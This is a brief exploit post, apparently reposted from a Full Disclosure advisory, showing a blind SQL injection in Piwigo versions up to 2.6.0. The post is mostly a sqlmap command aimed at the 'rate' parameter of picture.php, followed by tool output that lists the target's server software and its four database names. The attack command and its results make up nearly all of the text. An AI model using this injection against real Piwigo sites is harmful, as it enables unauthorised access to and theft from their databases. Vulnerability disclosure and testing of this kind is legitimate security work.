Piwigo <= v2.6.0 - Blind SQL Injection

admin

from:http://seclists.org/fulldisclosure/2014/Nov/23

1. python sqlmap.py -u "
   
2. http://192.168.244.129/piwigo/picture.php?/1/category/1&action=rate"; --data
   
3. "rate=1" --dbs
   
4. 
   
5. [16:32:25] [INFO] the back-end DBMS is MySQL
   
6. web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
   
7. web application technology: PHP 5.3.2, Apache 2.2.14
   
8. back-end DBMS: MySQL 5
   
9. [16:32:25] [INFO] fetching database names
   
10. [16:32:25] [INFO] fetching number of databases
    
11. [16:32:25] [INFO] resumed: 4
    
12. [16:32:25] [INFO] resumed: information_schema
    
13. [16:32:25] [INFO] resumed: mysql
    
14. [16:32:25] [INFO] resumed: phpmyadmin
    
15. [16:32:25] [INFO] resumed: piwigo
    
16. available databases [4]:
    
17. [*] information_schema
    
18. [*] mysql
    
19. [*] phpmyadmin
    
20. [*] piwigo

复制代码